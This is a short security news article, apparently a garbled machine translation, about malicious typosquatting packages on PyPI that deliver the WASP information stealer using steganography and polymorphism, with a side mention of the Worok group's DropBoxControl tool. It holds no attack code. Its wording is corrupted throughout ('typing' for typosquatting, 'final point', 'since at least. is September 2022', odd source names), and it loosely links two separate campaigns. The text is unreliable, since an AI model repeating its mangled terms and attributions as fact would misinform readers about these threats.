Network security Researchers from Checkmarx discovered more than two dozen malicious packages on PyPI, a popular repository for Python developers, and published their findings in a new report. report (opens in a new tab).
These malicious packages, designed to look almost identical to legitimate packages, try to trick reckless developers into downloading and installing the wrong packages, thereby distributing malware.
This method is called typing and it is quite popular among cybercriminals who specialize in attacking software developers.
information theft
To hide the malware, attackers are using two unique approaches: steganography and polymorphism.
Steganography is a method of hiding code inside an image, allowing threat actors to deliver malicious code through seemingly innocuous .JPG and .PNG files.
On the other hand, polymorphic malware changes its payload after each installation, thus successfully avoiding anti-virus programs and other cybersecurity solutions.
Here, the attackers used these techniques to deliver WASP, an information-stealing tool capable of obtaining people’s data. discord account, password, crypto wallet information, credit card data, as well as any other information about the victim final point deem interesting.
Once identified, the data is sent back to the attackers via a hard-coded Discord webhook address.
The campaign appears to be a marketing ploy, as apparently the researchers spotted the men advertising the tool on the dark web for $20 and claiming it was undetectable. presently.
Furthermore, the researchers believe this is the same group behind a similar attack first reported earlier this month by researchers at branch (opens in a new tab) and Test marks (opens in a new tab). Earlier, it was said that a group called Worok was distributing DropBoxControl, a custom .NET C# credential stealer that abuses the Dropbox file storage service for communication and data theft, since at least. is September 2022.
With its toolkit, the researchers believe Worok is the product of a clan of cyber-espionagers that operate quietly, preferring to traverse target networks and steal sensitive data. It also appears to be using its own proprietary tools, as the researchers have not observed them being used by anyone else.
Through the: Register (opens in a new tab)
